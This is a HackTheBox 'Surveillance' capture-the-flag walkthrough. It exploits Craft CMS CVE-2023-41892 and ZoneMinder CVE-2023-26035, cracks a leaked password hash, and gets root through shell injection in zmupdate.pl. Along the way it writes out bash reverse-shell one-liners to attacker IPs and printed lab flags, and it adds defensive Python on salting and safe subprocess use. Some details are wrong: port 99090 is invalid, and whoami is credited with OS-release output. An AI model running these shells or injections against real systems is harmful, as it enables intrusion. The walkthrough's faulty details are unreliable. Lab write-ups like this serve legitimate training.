This post covers the walkthrough of HackTheBox Surveillance, in which we demonstrate the exploitation of CVE-2023-41892, a recent vulnerability affecting Craft CMS, followed by the exploitation of CVE-2023-26035 affecting ZoneMinder. ZoneMinder is an integrated set of applications that provides a complete surveillance solution allowing capture, analysis, recording and monitoring of any CCTV or security cameras attached to a Linux based machine.
Before we start, add the host IP to the hosts file with the machine name:
echo '10.10.11.245 surveillance.htb' | sudo tee -a /etc/hosts
Scanning and Enumeration
Nmap scan results are below.
Command: nmap -Pn -p- --min-rate 5000 -A -oN nmap.txt 10.10.11.245
# Nmap 7.94SVN scan initiated Wed Jan 24 16:36:46 2024 as: nmap -Pn -p- --min-rate 5000 -A -oN nmap.txt 10.10.11.245
Nmap scan report for 10.10.11.245
Host is up (0.012s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 96:07:1c:c6:77:3e:07:a0:cc:6f:24:19:74:4d:57:0b (ECDSA)
|_ 256 0b:a4:c0:cf:e2:3b:95:ae:f6:f5:df:7d:0c:88:d6:ce (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://surveillance.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 143/tcp)
HOP RTT ADDRESS
1 11.81 ms 10.10.14.1
2 11.87 ms 10.10.11.245
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jan 24 16:37:15 2024 -- 1 IP address (1 host up) scanned in 29.07 seconds
On port 80, we have an nginx server:
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://surveillance.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Browsing to the main webserver page shows that it is potentially a Craft CMS server.
Additionally, the admin page can be found by running a directory enumeration with Gobuster using the command below:
gobuster dir -u http://surveillance.htb -w /usr/share/seclists/Discovery/Web-Content/big.txt -x php,txt,html -r -o gobuster-80.txt -t 100
The admin page is found at /admin/login.
Craft CMS Vulnerability Exploitation
What is Craft CMS?
Craft CMS is a content management system that is easy and clear to use. It offers every mechanism needed for the everyday chores of running a functional website, and content integration is hassle-free.
The version of Craft CMS in use is vulnerable to CVE-2023-41892, for which a POC is publicly available.
Understanding The Exploit
- The getTmpUploadDirAndDocumentRoot() function allows you to execute phpinfo, which reads the main web root in addition to the upload directory.
- The writePayloadToTempFile(documentRoot) function yields an HTTP 502 error indicating a successful exploit. We can write arbitrary PHP code to the site root as though it were an image by using the vulnerable Imagick extension.
- The trigerImagick(tmpDir) function performs a call to the Imagick extension to read our PHP file. The Imagick extension then reads our file and executes the PHP code.
Some people reported problems running the exploit, so if this happens to you, you can follow the Metasploit method outlined below.
Craft CMS Vulnerability Exploitation with Metasploit
sudo msfconsole
Then choose exploit/linux/http/craftcms_unauth_rce_cve_2023_41892
msf6 > use 1
msf6 > set rhosts surveillance.htb
msf6 > set rport 80
msf6 > set ssl false
msf6 > set lhost tun0
msf6 > set lport 443
msf6 > run
Once the session is established, you can move on to the post exploitation and privilege escalation phase.
Post Exploitation & Privilege Escalation
Running whoami and uname -a shows the output below, describing the operating system and the user we are running as:
PRETTY_NAME="Ubuntu 22.04.3 LTS"
NAME="Ubuntu"
VERSION_ID="22.04"
VERSION="22.04.3 LTS (Jammy Jellyfish)"
VERSION_CODENAME=jammy
ID=ubuntu
ID_LIKE=debian
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
UBUNTU_CODENAME=jammy
Linux surveillance 5.15.0-89-generic #99-Ubuntu SMP Mon Oct 30 20:42:41 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
uid=33(www-data) gid=33(www-data) groups=33(www-data)
After some OS enumeration, we noticed an SQL backup at the path below:
/var/www/html/craft/storage/backups/surveillance--2023-10-17-202801--v4.4.14.sql.zip
This database contained an unsalted SHA256 hash for the user matthew.
You can verify this by extracting the dump from the archive and grepping for the user:
unzip -p /var/www/html/craft/storage/backups/surveillance--2023-10-17-202801--v4.4.14.sql.zip | grep -i matt
Password Cracking with JohnTheRipper
Execute the commands below to add the hash to a file and crack it with John using the rockyou.txt wordlist:
echo '39ed84b22ddc63ab3725a1820aaa7f73a8f3f10d0848123562c9f35c675770ec' > hash
john --format=Raw-SHA256 --wordlist=rockyou.txt hash
You will find that the password is starcraftt122490, which we then use to log in as matthew over SSH:
ssh matthew@surveillance.htb
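The hash above cracked in seconds because Craft stored it as a bare SHA-256 digest: no salt and one cheap hash per guess, so a single pass over rockyou.txt covers every user in the dump. The Python below is an added illustration of that weakness beside the defensive alternative (per-user salt plus PBKDF2-HMAC-SHA256); it is not Craft CMS or John code, and the mini wordlist and function names are constructed for the demo.

```python
import hashlib
import hmac
import os
from typing import Iterable, Optional

# Constructed mini wordlist standing in for rockyou.txt; the last entry is the
# password the walkthrough recovered with john.
WORDLIST = ["password", "letmein", "starcraft", "starcraftt122490"]

def sha256_hex(password: str) -> str:
    """Unsalted SHA-256, the scheme the dump used: same input, same digest."""
    return hashlib.sha256(password.encode()).hexdigest()

def crack_unsalted_sha256(target_hex: str, wordlist: Iterable[str]) -> Optional[str]:
    """One cheap hash per candidate, and the work is reusable against every
    user's hash in the dump: that is all a dictionary attack needs here."""
    for candidate in wordlist:
        if hmac.compare_digest(sha256_hex(candidate), target_hex):
            return candidate
    return None

def store_password(password: str, iterations: int = 600_000) -> dict:
    """Defensive alternative: a random per-user salt and PBKDF2-HMAC-SHA256
    with a high iteration count. Store salt, iterations and derived key."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return {"salt": salt.hex(), "iterations": iterations, "dk": dk.hex()}

def verify_password(record: dict, password: str) -> bool:
    """Recompute with the stored salt and compare in constant time."""
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(record["salt"]), record["iterations"])
    return hmac.compare_digest(dk.hex(), record["dk"])

def same_password_same_record(password: str, iterations: int = 1000) -> bool:
    """With salts, two users sharing a password get different stored values,
    so one precomputed digest per wordlist entry no longer matches both."""
    a = store_password(password, iterations)
    b = store_password(password, iterations)
    return a["dk"] == b["dk"]

if __name__ == "__main__":
    # Hash quoted in the walkthrough for matthew; john recovered it from rockyou.txt.
    page_hash = "39ed84b22ddc63ab3725a1820aaa7f73a8f3f10d0848123562c9f35c675770ec"
    print("unsalted crack:", crack_unsalted_sha256(page_hash, WORDLIST))
    print("salted records collide:", same_password_same_record("starcraftt122490"))
```

With the salted scheme every guess costs the full iteration count and must be repeated per user, which is what turns a seconds-long crack into an impractical one.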
Network Pivoting & Lateral Movement
Running netstat to check the internal network connections, we found that the ZoneMinder service is listening on 127.0.0.1:8080, so we need port forwarding to be able to interact with it.
We can use chisel, which you can download and prepare on the attacker machine using the commands below:
wget https://github.com/jpillora/chisel/releases/download/v1.9.1/chisel_1.9.1_linux_amd64.gz -O chisel.gz
gunzip ./chisel.gz
chmod u+x ./chisel
We then host chisel on the attacker machine so that it can be downloaded to the HTB machine:
sudo python3 -m http.server 80
And on the HTB machine:
wget http://kali-vpn-ip/chisel -O /tmp/chisel
chmod u+x /tmp/chisel
Then we run chisel with the command below on the attacker machine:
sudo ./chisel server --reverse --port 8081 &
And on the HTB machine:
/tmp/chisel client 10.10.14.10:8081 R:99090:127.0.0.1:8080 R:3306:127.0.0.1:3006 &
If all went well, you should be able to navigate to 127.0.0.1:99090 to access the ZoneMinder service, whose version appears to be 1.36.32.
ZoneMinder Exploitation
What is ZoneMinder?
ZoneMinder is an integrated set of applications which provide a complete surveillance solution allowing capture, analysis, recording and monitoring of any CCTV or security cameras attached to a Linux based machine. It is designed to run on distributions which support the Video For Linux (V4L) interface and has been tested with video cameras attached to BTTV cards, various USB cameras and also supports most IP network cameras.
A little bit of researching and Googling shows that this version is vulnerable to CVE-2023-26035.
To get the exploit to work, just change line 16 from index.php to /index.php.
./zm-pwn.py --target http://127.0.0.1:99090 --cmd "bash -c 'bash -i >& /dev/tcp/<ATTACKER-IP>/4444 0>&1'"
Of course, don't forget to run a listener on your machine using netcat:
nc -lvp 4444
Doing this will get you a shell as the zoneminder user.
Note that any zm[a-zA-Z]*.pl script in /usr/bin/ can be run without a password by the zoneminder user.
PHP scripts often abuse the exec(), shell_exec(), or system() APIs to execute commands on the host.
When looking for Perl scripts that do the same, we searched for the exec() command.
The only issue is that, save for one script, none of them use this command, and the one that does is not vulnerable.
These Perl scripts do frequently reference the execute() command, which, from what I've looked up, is used to execute prepared SQL statements. We therefore need to find an execute() call that accepts a user parameter and does not restrict the user to particular data types or inputs.
The susceptible Perl script is zmupdate.pl: line 1056 is where the script takes our username input and runs it. The script hashes the inputs, so trying to exploit via the password won't work.
If we execute the command below, we can see '/bin/bash -ip' injected into the prepared SQL statement:
sudo /usr/bin/zmupdate.pl -u '/bin/bash -ip' -p '' -v 1
This means that if we run the command in a sub-shell, it will be evaluated before the rest of the prepared SQL statement.
sudo /usr/bin/zmupdate.pl -u '$(bash -c "bash -ip >& /dev/tcp/10.10.14.10/443 0>&1")' -p '' -v 1
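The bug driven through zmupdate.pl above belongs to a well known class: an untrusted value (here the username) is concatenated into a command string that a shell evaluates, so a $(...) sub-shell in the value runs before the intended command does. The Python below is an added illustration of that class beside its hardened form; it is not ZoneMinder's code, echo stands in for the real sink, and the function and regex names are invented for the demo.

```python
import re
import subprocess

# Allowlist for a database username; anything outside it is rejected outright.
USERNAME_RE = re.compile(r"^[A-Za-z0-9_.-]{1,32}$")

def build_vulnerable_command(db_user: str) -> str:
    # Vulnerable pattern: the value is interpolated into one string that will
    # later be handed to /bin/sh, so shell syntax inside it is honoured.
    return f"echo connecting as -u{db_user}"

def run_vulnerable(db_user: str) -> str:
    # shell=True gives the string to sh, which expands $(...) before echo
    # ever runs: the username is treated as shell code, not as data.
    out = subprocess.run(build_vulnerable_command(db_user), shell=True,
                         capture_output=True, text=True)
    return out.stdout.strip()

def run_hardened(db_user: str) -> str:
    # Fix 1: validate at the trust boundary against an allowlist.
    if not USERNAME_RE.match(db_user):
        raise ValueError("username contains characters outside the allowlist")
    # Fix 2: pass an argument vector with no shell, so the value reaches the
    # program verbatim and $(...) is just characters.
    out = subprocess.run(["echo", "connecting as", f"-u{db_user}"],
                         capture_output=True, text=True)
    return out.stdout.strip()

if __name__ == "__main__":
    print(run_vulnerable("matthew"))
    print(run_vulnerable("$(echo INJECTED)"))   # sub-shell output appears in place
    print(run_hardened("matthew"))
```

The sudoers wildcard that lets the zoneminder user run any zm*.pl as root is the other half of the chain; with a fixed argument vector and an allowlisted username the injected sub-shell never executes, and with a narrower sudo rule it would not execute as root.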
HackTheBox Surveillance Root & User Flags
User Flag
1f4b734f81280d55388c9ff39cd13152
Root Flag
3457f277222b96dc0f126f9d92defe37